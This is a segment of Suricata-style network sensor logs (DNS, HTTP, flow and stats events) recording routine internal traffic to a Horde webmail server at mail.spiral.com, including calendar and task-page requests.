{"timestamp":"2020-02-29T00:15:50.330124+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47730,"proto":"UDP","dns":{"type":"answer","id":24645,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:50.330124+0000","flow_id":1337670470361580,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":47730,"proto":"UDP","dns":{"type":"answer","id":24645,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:50.404112+0000","flow_id":623112466345782,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34846,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7753}} {"timestamp":"2020-02-29T00:15:51.000352+0000","flow_id":1428599203355264,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.1","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:10:50.449152+0000","end":"2020-02-29T00:10:50.451079+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:15:52.000623+0000","flow_id":1918758066486106,"event_type":"flow","src_ip":"192.168.10.130","src_port":34834,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1079,"bytes_toclient":4820,"start":"2020-02-29T00:14:46.031578+0000","end":"2020-02-29T00:14:51.218164+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:52.475712+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35574,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":42047,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:15:52.580812+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35574,"proto":"UDP","dns":{"type":"answer","id":42047,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:15:52.580812+0000","flow_id":1877711068348992,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35574,"proto":"UDP","dns":{"type":"answer","id":42047,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:15:52.619485+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99}} {"timestamp":"2020-02-29T00:15:52.619485+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34848,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:15:54.000393+0000","event_type":"stats","stats":{"uptime":14606,"capture":{"kernel_packets":136002,"kernel_drops":0},"decoder":{"pkts":136021,"bytes":93587551,"invalid":188,"ipv4":134506,"ipv6":8,"ethernet":136021,"raw":0,"null":0,"sll":0,"tcp":129137,"udp":5166,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2790,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2806,"synack":2797,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1829,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2362,"failed_udp":112},"tx":{"http":4693,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2442}},"flow_mgr":{"closed_pruned":2771,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":4,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65528,"rows_empty":3,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22479,"memcap_state":0,"memcap_global":0},"http":{"memuse":92914,"memcap":0}}} {"timestamp":"2020-02-29T00:15:55.000509+0000","flow_id":30355435553035,"event_type":"flow","src_ip":"192.168.10.81","src_port":52758,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":2866,"bytes_toclient":7700,"start":"2020-02-29T00:14:44.196875+0000","end":"2020-02-29T00:14:54.542150+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:15:55.405021+0000","flow_id":623112466345782,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34846,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7753},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":26692,"tx_id":0}} {"timestamp":"2020-02-29T00:15:57.624359+0000","flow_id":198980151024429,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34848,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":99},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":96,"tx_id":0}} {"timestamp":"2020-02-29T00:16:01.000196+0000","event_type":"stats","stats":{"uptime":14613,"capture":{"kernel_packets":136038,"kernel_drops":0},"decoder":{"pkts":136039,"bytes":93589986,"invalid":188,"ipv4":134524,"ipv6":8,"ethernet":136039,"raw":0,"null":0,"sll":0,"tcp":129153,"udp":5168,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2791,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2807,"synack":2798,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1830,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2363,"failed_udp":112},"tx":{"http":4694,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2443}},"flow_mgr":{"closed_pruned":2773,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22479,"memcap_state":0,"memcap_global":0},"http":{"memuse":24177,"memcap":0}}} {"timestamp":"2020-02-29T00:16:03.000121+0000","flow_id":1847126602345263,"event_type":"flow","src_ip":"192.168.10.130","src_port":34836,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":24,"pkts_toclient":25,"bytes_toserver":2616,"bytes_toclient":28174,"start":"2020-02-29T00:14:52.715567+0000","end":"2020-02-29T00:15:01.606362+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:03.979541+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60926,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":15141,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:04.086107+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60926,"proto":"UDP","dns":{"type":"answer","id":15141,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:04.086107+0000","flow_id":1602206096945749,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60926,"proto":"UDP","dns":{"type":"answer","id":15141,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:04.218436+0000","flow_id":544162378397647,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52762,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8820}} {"timestamp":"2020-02-29T00:16:08.000247+0000","event_type":"stats","stats":{"uptime":14620,"capture":{"kernel_packets":136044,"kernel_drops":0},"decoder":{"pkts":136059,"bytes":93601097,"invalid":188,"ipv4":134544,"ipv6":8,"ethernet":136059,"raw":0,"null":0,"sll":0,"tcp":129171,"udp":5170,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2792,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2808,"synack":2799,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1831,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2364,"failed_udp":112},"tx":{"http":4695,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2444}},"flow_mgr":{"closed_pruned":2774,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22809,"memcap_state":0,"memcap_global":0},"http":{"memuse":109686,"memcap":0}}} {"timestamp":"2020-02-29T00:16:09.219329+0000","flow_id":544162378397647,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52762,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8820},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":36778,"tx_id":0}} {"timestamp":"2020-02-29T00:16:10.000881+0000","flow_id":512302305152088,"event_type":"flow","src_ip":"192.168.10.130","src_port":34830,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":14,"bytes_toserver":2179,"bytes_toclient":9824,"start":"2020-02-29T00:14:34.691288+0000","end":"2020-02-29T00:15:09.176468+0000","age":35,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:13.650442+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":58932,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29509,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:13.758493+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58932,"proto":"UDP","dns":{"type":"answer","id":29509,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:13.758493+0000","flow_id":144498492304586,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":58932,"proto":"UDP","dns":{"type":"answer","id":29509,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:13.789852+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50}} {"timestamp":"2020-02-29T00:16:13.789852+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34850,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:16:14.000386+0000","flow_id":480231771154811,"event_type":"flow","src_ip":"192.168.10.122","src_port":34716,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:13.403835+0000","end":"2020-02-29T00:11:13.512776+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:15.000325+0000","event_type":"stats","stats":{"uptime":14627,"capture":{"kernel_packets":136059,"kernel_drops":0},"decoder":{"pkts":136062,"bytes":93601295,"invalid":188,"ipv4":134547,"ipv6":8,"ethernet":136062,"raw":0,"null":0,"sll":0,"tcp":129174,"udp":5170,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2792,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2808,"synack":2799,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1831,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2364,"failed_udp":112},"tx":{"http":4695,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2444}},"flow_mgr":{"closed_pruned":2775,"new_pruned":15,"est_pruned":2409,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22810,"memcap_state":0,"memcap_global":0},"http":{"memuse":39762,"memcap":0}}} {"timestamp":"2020-02-29T00:16:15.001120+0000","flow_id":422730764433898,"event_type":"flow","src_ip":"192.168.10.130","src_port":34838,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":1875,"bytes_toclient":5458,"start":"2020-02-29T00:15:08.702954+0000","end":"2020-02-29T00:15:14.111373+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:17.582541+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":59430,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":3528,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:17.690881+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59430,"proto":"UDP","dns":{"type":"answer","id":3528,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:17.690881+0000","flow_id":826028198060941,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":59430,"proto":"UDP","dns":{"type":"answer","id":3528,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:17.721778+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37}} {"timestamp":"2020-02-29T00:16:17.721778+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52764,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":6,"tx_id":0}} {"timestamp":"2020-02-29T00:16:18.794784+0000","flow_id":1230407958635898,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34850,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/poll","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":50},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/poll","state":"CLOSED","stored":false,"size":30,"tx_id":0}} {"timestamp":"2020-02-29T00:16:19.000874+0000","flow_id":1941895041657687,"event_type":"flow","src_ip":"192.168.10.122","src_port":54337,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:18.863063+0000","end":"2020-02-29T00:11:18.971428+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:20.000316+0000","flow_id":316799676049850,"event_type":"flow","src_ip":"192.168.10.122","src_port":46411,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:19.256442+0000","end":"2020-02-29T00:11:19.364994+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:20.105331+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":57167,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52826,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:20.214280+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57167,"proto":"UDP","dns":{"type":"answer","id":52826,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:20.214280+0000","flow_id":553916250233715,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":57167,"proto":"UDP","dns":{"type":"answer","id":52826,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:20.332072+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306}} {"timestamp":"2020-02-29T00:16:20.332072+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34852,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/saveEvent","state":"CLOSED","stored":false,"size":923,"tx_id":0}} 